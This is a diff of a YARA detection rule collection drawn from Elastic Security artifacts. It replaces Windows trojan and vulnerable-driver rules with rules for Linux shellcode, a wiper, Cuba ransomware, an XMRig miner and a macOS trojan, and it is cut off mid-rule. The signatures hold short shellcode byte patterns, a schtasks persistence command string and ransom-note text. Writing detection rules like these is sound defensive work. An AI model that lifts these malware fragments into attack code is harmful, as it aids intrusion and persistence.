"https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Shellcode_Generic.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bd22648babbee04555cef52bfe3e0285d33852e85d254b8ebc847e4e841b447e" + logic_hash = "8c4a2bb63f0926e7373caf0a027179b4730cc589f9af66d2071e88f4165b0f73" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5841d70a38d4620c446427c80ca12b5e918f23e90c5288854943b0240958bcfb" + fingerprint = "e23b239775c321d4326eff2a7edf0787116dd6d8a9e279657e4b2b01b33e72aa" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "msvbvm60.dll" wide fullword - $a2 = "C:\\Program Files\\qga\\qga.exe" ascii fullword - $a3 = "C:\\Program Files\\Qemu-ga\\qemu-ga.exe" ascii fullword - $a4 = "USERPROFILE=" wide fullword - $a5 = "Startup key" ascii fullword + $a = { 89 E6 6A 10 5A 6A 2A 58 0F 05 48 85 C0 79 1B 49 FF C9 74 22 } condition: all of them } -rule ELASTIC_Windows_Trojan_Guloader_C4D9Dd33 : FILE MEMORY +rule ELASTIC_Linux_Shellcode_Generic_99B991Cd : FILE MEMORY { meta: - description = "Detects Windows Trojan Guloader (Windows.Trojan.Guloader)" + description = "Detects Linux Shellcode Generic (Linux.Shellcode.Generic)" author = "Elastic Security" - id = "c4d9dd33-b7e7-4ff4-a2f3-62316d064f5a" - date = "2021-08-17" - modified = "2021-10-04" - reference = "https://www.elastic.co/security-labs/getting-gooey-with-guloader-downloader" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Guloader.yar#L26-L45" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a3e2d5013b80cd2346e37460753eca4a4fec3a7941586cc26e049a463277562e" - logic_hash = "623ea751fc32648720bda40598024d4d5b6a9a11b3cce3c9427310ba17745643" + id = "99b991cd-a5ca-475c-8c10-e43b9d22d26e" + date = "2021-04-06" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Shellcode_Generic.yar#L81-L99" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "954b5a073ce99075b60beec72936975e48787bea936b4c5f13e254496a20d81d" + logic_hash = "664e213314fe1d6f1920de237ebea3a94f7fbc42eff089475674ccef812f0f68" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "53a2d6f895cdd1a6384a55756711d9d758b3b20dd0b87d62a89111fd1a20d1d6" + fingerprint = "ed904a3214ccf43482e3ddf75f3683fea45f7c43a2f1860bac427d7d15d8c399" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "This program cannot be run under virtual environment or debugging software !" ascii fullword + $a = { 6E 89 E3 50 53 89 E1 B0 0B CD 80 00 4C 65 6E 67 } condition: all of them } -rule ELASTIC_Windows_Trojan_Guloader_2F1E44C8 : FILE MEMORY +rule ELASTIC_Linux_Shellcode_Generic_24B9Aa12 : FILE MEMORY { meta: - description = "Detects Windows Trojan Guloader (Windows.Trojan.Guloader)" + description = "Detects Linux Shellcode Generic (Linux.Shellcode.Generic)" author = "Elastic Security" - id = "2f1e44c8-f269-4cd6-a516-8d9282ddcfbc" - date = "2023-10-30" - modified = "2023-11-02" - reference = "https://www.elastic.co/security-labs/getting-gooey-with-guloader-downloader" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Guloader.yar#L47-L70" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6ae7089aa6beaa09b1c3aa3ecf28a884d8ca84f780aab39902223721493b1f99" - logic_hash = "434b33c3fdc6bf4b0f59cd4aba66327d0b7ab524be603b256494d46b609cecd5" + id = "24b9aa12-92b2-492d-9a0e-078cdab5830a" + date = "2021-04-06" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Shellcode_Generic.yar#L101-L119" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "24b2c1ccbbbe135d40597fbd23f7951d93260d0039e0281919de60fa74eb5977" + logic_hash = "4685253eb00a21d6dd6e874ff68209f20c8668262f24767086687555ccf934aa" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b00255f8d7ce460ffc778e96f6101db753e8992d36ee75a25b48e32ac7817c58" + fingerprint = "0ded0ad2fdfff464bf9a0b5a59b8edfe1151a513203386daae6f9f166fd48e5c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $djb2_str_compare = { 83 C0 08 83 3C 04 00 0F 84 [4] 39 14 04 75 } - $check_exception = { 8B 45 ?? 8B 00 38 EC 8B 58 ?? 84 FD 81 38 05 00 00 C0 } - $parse_mem = { 18 00 10 00 00 83 C0 18 50 83 E8 04 81 00 00 10 00 00 50 } - $hw_bp = { 39 48 0C 0F 85 [4] 39 48 10 0F 85 [4] 39 48 14 0F 85 [7] 39 48 18 } - $scan_protection = { 39 ?? 14 8B [5] 0F 84 } + $a = { 6E 89 E3 89 C1 89 C2 B0 0B CD 80 31 C0 40 CD 80 } condition: - 2 of them + all of them } -rule ELASTIC_Windows_Trojan_Asyncrat_11A11Ba1 : FILE MEMORY +rule ELASTIC_Linux_Shellcode_Generic_8Ac37612 : FILE MEMORY { meta: - description = "Detects Windows Trojan Asyncrat (Windows.Trojan.Asyncrat)" + description = "Detects Linux Shellcode Generic (Linux.Shellcode.Generic)" author = "Elastic Security" - id = "11a11ba1-c178-4415-9c09-45030b500f50" - date = "2021-08-05" - modified = "2021-10-04" + id = "8ac37612-aec8-4376-8269-2594152ced8a" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Asyncrat.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1" - logic_hash = "c6c4ce9ccf01c280be6c25c0c82c34b601626bc200b84d3e77b08be473335d3d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Shellcode_Generic.yar#L121-L139" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c199b902fa4b0fcf54dc6bf3e25ad16c12f862b47e055863a5e9e1f98c6bd6ca" + logic_hash = "c0af751bc54dcd9cf834fa5fe9fa120be5e49a56135ebb72fd6073948e956929" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8" + fingerprint = "97a3d3e7ff4c9ae31f71e609d10b3b848cb0390ae2d1d738ef53fd23ff0621bc" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "/c schtasks /create /f /sc onlogon /rl highest /tn \"" wide fullword - $a2 = "Stub.exe" wide fullword - $a3 = "get_ActivatePong" ascii fullword - $a4 = "vmware" wide fullword - $a5 = "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide fullword - $a6 = "get_SslClient" ascii fullword + $a = { 89 E3 ?? 53 89 E1 B0 0B CD 80 00 47 43 43 3A } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Msio_Aa20A3C6 : FILE +rule ELASTIC_Linux_Shellcode_Generic_932Ed0F0 : FILE MEMORY { meta: - description = "Detects Windows Vulndriver Msio (Windows.VulnDriver.MsIo)" + description = "Detects Linux Shellcode Generic (Linux.Shellcode.Generic)" author = "Elastic Security" - id = "aa20a3c6-c07c-49ef-be33-b61e612be42a" - date = "2022-04-04" - modified = "2022-04-04" + id = "932ed0f0-bd43-4367-bcc3-ecd8f65b52ee" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_MsIo.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6" - logic_hash = "3b383934dc91536f69e2c6cb2cf2054c5f8a08766ecf1d1804c57f3a2c39c1c2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Shellcode_Generic.yar#L141-L159" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f357597f718f86258e7a640250f2e9cf1c3363ab5af8ddbbabb10ebfa3c91251" + logic_hash = "20ae3f1d96f8afd0900ac919eacaff3bd748a7466af5bb2b9f77cfdc4b8b829e" score = 75 quality = 75 - tags = "FILE" - fingerprint = "28136b3928fa2c13dc3950df4b71f01f0d2e3977ca131df425096ec36fe6aad1" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "7aa4619d2629b5d795e675d17a6e962c6d66a75e11fa884c0b195cb566090070" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $str1 = "\\MsIo32.pdb" + $a = { E3 50 89 E2 53 89 E1 B0 0B CD 80 31 C0 40 CD 80 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + all of them } -rule ELASTIC_Windows_Vulndriver_Msio_Ce0Bda23 : FILE +rule ELASTIC_Windows_Vulndriver_Powerprofiler_2Eedff78 : FILE { meta: - description = "Detects Windows Vulndriver Msio (Windows.VulnDriver.MsIo)" + description = "Name: AMDPowerProfiler.sys, Version: 6.1.0.0" author = "Elastic Security" - id = "ce0bda23-087c-49ec-b064-88b1d45e785a" - date = "2022-04-04" - modified = "2022-04-04" + id = "2eedff78-aa9b-4dab-b5f4-187bd2fc9a0c" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_MsIo.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89" - logic_hash = "f7fbe0255a006cce42aff61b294512c11e1cceaf11d5c1b6f75b96fb3b155895" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_PowerProfiler.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05" + logic_hash = "c4a7ae2ffdf70984cea5b543af93b202c78b6108da1e442186d24071b44d6259" score = 75 quality = 75 tags = "FILE" - fingerprint = "fe0c380dabec41458a5b5e0d7d38a4f9282f1ef87c51addd954da70d7c8ab1f2" + fingerprint = "1273f1cd2de84076be28d7fb5fdac5fc9ab0de6f4e18915bdce6333181983cfb" + threat_name = "Windows.VulnDriver.PowerProfiler" severity = 50 arch_context = "x86" scan_context = "file" @@ -73741,413 +74151,450 @@ rule ELASTIC_Windows_Vulndriver_Msio_Ce0Bda23 : FILE os = "windows" strings: - $str1 = "\\MsIo64.pdb" + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 41 00 4D 00 44 00 50 00 6F 00 77 00 65 00 72 00 50 00 72 00 6F 00 66 00 69 00 6C 00 65 00 72 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x01][\x00-\x00])([\x00-\x06][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x05][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x06][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Windows_Vulndriver_Xtier_48Bb4B2C : FILE +rule ELASTIC_Windows_Wiper_Doublezero_65Ec0C50 : FILE MEMORY { meta: - description = "Name: nscm.sys, Version: 3.1.12.0" + description = "Detects Windows Wiper Doublezero (Windows.Wiper.DoubleZero)" author = "Elastic Security" - id = "48bb4b2c-da6c-4e2a-bbbe-75c7a892bdc6" - date = "2022-04-07" - modified = "2022-04-07" + id = "65ec0c50-4038-46a7-879b-fbb4aab18725" + date = "2022-03-22" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_XTier.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f" - logic_hash = "fd6ae610a4d2cbf02aae2302d181d07780e723ac7e61b5aa3fd18ba834160729" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Wiper_DoubleZero.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3b2e708eaa4744c76a633391cf2c983f4a098b46436525619e5ea44e105355fe" + logic_hash = "bce33817d99f71b9d087ea079ef8db08b496315b72cf9d1cf6f0b107a604e52c" score = 75 quality = 75 - tags = "FILE" - fingerprint = "bd50e4b3d9999d68574903bd9ec144be7456908658639852480418315903da5b" - threat_name = "Windows.VulnDriver.XTier" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "2441bcdf7bc48df098f4ef68231fb15fc5c8f96af2e170de77f1718487b945b2" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 6E 00 73 00 63 00 6D 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x0c][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x02][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x0b][\x00-\x00]))/ + $s1 = "\\Users\\\\.*?\\\\AppData\\\\Roaming\\\\Microsoft.*" wide fullword + $s2 = "\\Users\\\\.*?\\\\AppData\\\\Local\\\\Application Data.*" wide fullword + $s3 = "\\Users\\\\.*?\\\\Local Settings.*" wide fullword + $s4 = "get__beba00adeeb086e6" ascii fullword + $s5 = "FileShareWrite" ascii fullword condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Windows_Vulndriver_Xtier_8A2F6Dc1 : FILE +rule ELASTIC_Windows_Ransomware_Cuba_E64A16B1 : FILE MEMORY { meta: - description = "Name: libnicm.sys, Version: 3.1.12.0" + description = "Detects Windows Ransomware Cuba (Windows.Ransomware.Cuba)" author = "Elastic Security" - id = "8a2f6dc1-82f4-4e87-a4d6-49a36ea4fab8" - date = "2022-04-07" - modified = "2022-04-07" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_XTier.yar#L23-L43" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3" - logic_hash = "90e1efd9d918f15459dd3fabb4737cbdeded66da1d556becca051bdda5867c11" + id = "e64a16b1-262c-4835-bd95-4dde89dd75f4" + date = "2021-08-04" + modified = "2021-10-04" + reference = "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Cuba.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "33352a38454cfc247bc7465bf177f5f97d7fd0bd220103d4422c8ec45b4d3d0e" + logic_hash = "915425ad49f1b9ebde114f92155d5969ec707304403f46d891d014b399165a4d" score = 75 quality = 75 - tags = "FILE" - fingerprint = "0142537ba2fa5fa44cf89e0f2126da2b18894115c6152e1f3eaeb759951aba26" - threat_name = "Windows.VulnDriver.XTier" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "840f2ebe2664db9a0918acf7d408ca8060ee0d3c330ad08b36e5be7f7e2cf069" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 6C 00 69 00 62 00 6E 00 69 00 63 00 6D 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x0c][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x02][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x0b][\x00-\x00]))/ + $a = { 45 EC 8B F9 8B 45 14 89 45 F0 8D 45 E4 50 8D 45 F8 66 0F 13 } + $HeaderCheck = { 8B 06 81 38 46 49 44 45 75 ?? 81 78 04 4C 2E 43 41 74 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + any of them } -rule ELASTIC_Windows_Vulndriver_Xtier_F4760D4A : FILE +rule ELASTIC_Windows_Ransomware_Cuba_95A98E69 : FILE MEMORY { meta: - description = "Name: NICM.SYS, Version: 3.1.12.0" + description = "Detects Windows Ransomware Cuba (Windows.Ransomware.Cuba)" author = "Elastic Security" - id = "f4760d4a-42da-4bb8-87ff-3b2e709c6a95" - date = "2022-04-07" - modified = "2022-04-07" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_XTier.yar#L45-L65" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003" - logic_hash = "dc83771e08b8530bf138782ba8c7724e7ecff40c973407a7f654346302a284d5" + id = "95a98e69-ce6c-40c6-a05b-2366c663ad6e" + date = "2021-08-04" + modified = "2021-10-04" + reference = "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Cuba.yar#L23-L44" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "00f18713f860dc8394fb23a1a2b6280d1eb2f20a487c175433a7b495a1ba408d" + logic_hash = "d17ef93943e826613be4c21ad1e41d1daa33db9da0fa6106bb8ba6334ebe1d08" score = 75 quality = 75 - tags = "FILE" - fingerprint = "95f3b1f788edb8a6cd121dc44fd1426ff1b29cf3231c6f3f4ec434d288cd8deb" - threat_name = "Windows.VulnDriver.XTier" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "05cfd7803692149a55d9ced84828422b66e8b301c8c2aae9ca33c6b68e29bcf8" + severity = 90 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 4E 00 49 00 43 00 4D 00 2E 00 53 00 59 00 53 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x0c][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x02][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x0b][\x00-\x00]))/ + $a1 = "We also inform that your databases, ftp server and file server were downloaded by us to our servers." ascii fullword + $a2 = "Good day. All your files are encrypted. For decryption contact us." ascii fullword + $a3 = ".cuba" wide fullword condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Windows_Vulndriver_Xtier_6A7De49F : FILE +rule ELASTIC_Macos_Cryptominer_Xmrig_241780A1 : FILE MEMORY { meta: - description = "Name: NCPL.SYS, Version: 3.1.12.0" + description = "Detects Macos Cryptominer Xmrig (MacOS.Cryptominer.Xmrig)" author = "Elastic Security" - id = "6a7de49f-1a31-4ce0-b4b1-cdc670bfdf18" - date = "2022-04-07" - modified = "2022-04-07" + id = "241780a1-ad50-4ded-b85a-26339ae5a632" + date = "2021-09-30" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_XTier.yar#L67-L87" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7" - logic_hash = "de0d25377103d50b33a95a804b9c3eb9ef221d56fa1dfda0a32f14dcd95ee4b1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Cryptominer_Xmrig.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f" + logic_hash = "9e091f6881a96abdc6592db385eb9026806befdda6bda4489470b4e16e1d4d87" score = 75 quality = 75 - tags = "FILE" - fingerprint = "fb012fd29d00b1dc06353ebfff62d29cc9d86549d8af10b049213256cbcab09e" - threat_name = "Windows.VulnDriver.XTier" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 4E 00 43 00 50 00 4C 00 2E 00 53 00 59 00 53 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x0c][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x02][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x0b][\x00-\x00]))/ + $a1 = "mining.set_target" ascii fullword + $a2 = "XMRIG_HOSTNAME" ascii fullword + $a3 = "Usage: xmrig [OPTIONS]" ascii fullword + $a4 = "XMRIG_VERSION" ascii fullword condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Linux_Exploit_Lotoor_03C81Bd9 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Kandykorn_A7Bb6944 : FILE MEMORY { meta: - description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" + description = "Detects Macos Trojan Kandykorn (MacOS.Trojan.KandyKorn)" author = "Elastic Security" - id = "03c81bd9-c7d1-4044-9cce-951637b2b523" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Lotoor.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3fc701a2caab0297112501f55eaeb05264c5e4099c411dcadc7095627e19837a" - logic_hash = "dc2dfa128f509221cae8bae9864190e8316bb7a5ae081da1076081b5f4fdc870" + id = "a7bb6944-90fa-40ba-840c-f044f12dcb39" + date = "2023-10-23" + modified = "2023-10-23" + reference = "https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_KandyKorn.yar#L1-L29" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "51dd4efcf714e64b4ad472ea556bf1a017f40a193a647b9e28bf356979651077" + logic_hash = "65decd519dee947894dd684c52d91202ebe5587acfecc0b8b56cd73f2981e387" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "329dc1e21088c87095ee030c597a3340f838c338403ae64aec574e0086281461" + fingerprint = "f2b2ebc056c79448b077dce140b2a73d6791b61ddc8bf21d4c565c95f5de49e7" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 65 00 65 78 70 5F 73 74 61 74 65 00 6D 65 6D 73 65 74 00 70 } + $str_1 = "resp_file_dir" + $str_2 = "resp_cfg_set" + $str_3 = "resp_proc_kill" + $str_4 = 